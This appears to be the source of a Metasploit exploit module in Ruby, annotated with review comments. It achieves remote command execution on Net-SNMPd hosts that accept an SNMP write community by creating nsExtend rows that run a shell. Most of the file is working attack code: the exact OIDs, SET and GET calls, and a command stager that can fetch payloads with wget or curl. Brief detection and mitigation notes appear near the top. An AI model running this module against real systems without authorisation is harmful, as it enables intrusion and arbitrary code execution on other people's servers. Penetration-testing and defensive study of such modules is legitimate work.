Path: blob/master/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'snmp'

# Net-SNMPd command execution through NET-SNMP-EXTEND-MIB over SNMP write access.
#
# Everything this module does on the wire is an SNMP SET of three nsExtend* rows
# followed by a GET of the extension's output row, addressed to rhost:rport with
# the COMMUNITY datastore value. It therefore only works where that community is
# accepted for SET (a read-write community, e.g. an `rwcommunity` entry in
# snmpd.conf); a read-only community yields no code execution. The payload itself
# is delivered by Msf::Exploit::CmdStager, which calls #execute_command once per
# staged chunk.
#
# Defensive notes: SET requests against the 1.3.6.1.4.1.8072.1.3.2 subtree
# (nsExtendConfigTable) from unexpected sources are the detection signal; the
# mitigation is to keep write communities off untrusted networks and to avoid
# exposing SNMP write access at all where it is not needed.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Supplies the COMMUNITY option plus rhost/rport and SNMP helpers used below.
  include Msf::Exploit::Remote::SNMPClient
  # Supplies execute_cmdstager and the `flavor` accessor used in #execute_command.
  include Msf::Exploit::CmdStager

  # Module metadata and options.
  #
  # FILEPATH and CHUNKSIZE are passed to the command stager in #exploit; SHELL
  # is the program written into nsExtendCommand (it receives the staged command
  # as its -c argument).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
        'Description' => %q(
          This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
          configure MIB extensions and lead to remote code execution.
        ),
        'License' => MSF_LICENSE,
        'Author' => ['Steve Embling at InteliSecure'],
        'References' =>
          [
            [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],
            [ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],
            [ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],
            [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']
          ],
        'Payload' =>
          {
            'Space' => 4096
            # note space above is not a hard limit and can be increased if required
            # 'BadChars' => "\x00"
          },
        'Targets' =>
          [
            ['Linux x86', {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}],
            ['Linux x64', {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}]
          ],
        # Not tested on other platforms but confirmed the above works.
        'DisclosureDate' => '2004-05-10',
        'DefaultTarget' => 0,
      )
    )
    register_options(
      [
        # Directory the command stager uses for its temporary file (see #exploit).
        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
        # Upper bound on bytes per staged command; converted with to_i in #exploit.
        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),
        OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])
      ])
  end

  # CmdStager callback: runs one staged shell command on the agent by creating
  # an extension row named "tmp" (the trailing 3.116.109.112 in each OID is the
  # row index: length 3, then the bytes of "tmp") and sets:
  #   NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp"  = INTEGER: createAndGo(4)
  #   NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable  (SHELL)
  #   NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp"    = STRING: arguments            ("-c \"cmd\"")
  # then reads oid_4 (the first line of the extension's output table).
  # NOTE(review): presumably the GET of the output row is what makes snmpd run the
  # extension — confirm against the MIB reference listed above.
  # The SET/GET round is performed twice; see the comment before the second round.
  #
  # @param cmd [String] shell command produced by the command stager
  # @param opts [Hash] unused; kept for the CmdStager callback signature
  def execute_command(cmd, opts = {})
    # nsExtendStatus."tmp" — RowStatus createAndGo
    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
    oid_1_value = 4
    # nsExtendCommand."tmp" — the binary to run (datastore SHELL)
    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
    oid_2_value = datastore['SHELL']
    # nsExtendArgs."tmp" — arguments given to that binary
    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
    # Output row of the "tmp" extension (line index 1); only read, never set
    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'

    comm = datastore['COMMUNITY']

    # The bourne stager flavor emits commands already suited for direct use;
    # every other flavor is passed through Shellwords#shellescape first.
    cmd = cmd.shellescape unless flavor == :bourne

    # NOTE(review): the (possibly shell-escaped) command is then wrapped in double
    # quotes; whether that survives intact depends on how snmpd tokenises
    # nsExtendArgs before passing it to SHELL — confirm for each flavor.
    oid_3_value = "-c \"#{cmd}\""

    vprint_status(oid_3_value)
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
      # vprint_status(manager.get_value("sysDescr.0"))
      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
      # NOTE(review): resp is assigned but never inspected, so a SET that the agent
      # rejects (e.g. read-only community) is not reported here.
      resp = manager.set([varbind1, varbind2, varbind3])
      vprint_status(manager.get_value(oid_4).to_s)
    end
    # Hit same again, first rewrite appears to remove the MIB, the next reinstates it.
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
      begin
        resp = manager.set([varbind1, varbind2, varbind3])
        vprint_status(manager.get_value(oid_4).to_s)
      rescue SNMP::RequestTimeout
        # A timeout on this round is treated as a good sign rather than an error,
        # presumably because the agent blocks while the staged command runs
        # (e.g. a payload that does not return) — not confirmed by this code.
        print_good("SNMP request timeout (this is promising).")
      end
    end
  end

  # Entry point: hands the payload to the command stager, which splits it into
  # at most CHUNKSIZE bytes per command, uses FILEPATH as its temp location and
  # calls #execute_command for each resulting command.
  def exploit
    execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, :temp => datastore['FILEPATH'])
  end
end